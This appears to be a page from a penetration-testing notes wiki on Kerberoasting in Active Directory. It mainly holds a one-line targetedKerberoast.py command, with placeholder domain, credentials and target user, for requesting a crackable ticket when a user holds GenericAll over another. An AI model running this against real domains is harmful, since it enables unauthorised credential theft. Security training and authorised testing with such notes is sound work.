⚔️
DWSec Wiki
  • Welcome to the DWSec Notes
  • Windows Privilege Escalation
  • Active Directory
    • Fundamentals
      • Introduction
      • Protocols
      • Authentication
      • Glossary of terms
      • Objects
      • AD CS
    • Pentest Methodology
    • Insecure Logins
    • Bloodhound & ldapdomaindump
    • NTLMRelaying (445)
    • SMB Coercing (445)
    • Pre2k
    • DACL Abuse
    • Kerberoasting
    • Utility Tools
    • Powershell
  • Networking
    • Fundamentals
    • Pivoting, Tunneling and Portforwarding
    • DNS
    • Ligolo-ng
    • Toolbox
    • Protocols
      • 80/443 - HTTP/HTTPS
      • 389 - LDAP
      • 445 - SMB
  • Web
    • Active Enumeration
    • Passive Enumeration
  • ADPwn
  • Tools
    • Tools overview
Powered by GitBook
On this page
  • Basics
  • Targeted Kerberoasting

Was this helpful?

  1. Active Directory

Kerberoasting

PreviousDACL AbuseNextUtility Tools

Last updated 5 months ago

Was this helpful?

Basics

Targeted Kerberoasting

Works when users is having GenericAll Relation to another user

  • Tool:

python3 ./targetedKerberoast.py -v -d <DC_IP> -u <USER> -p <PASSWORD> -d <DOMAIN> --request-user <TARGET_USERNAME>

https://github.com/ShutdownRepo/targetedKerberoast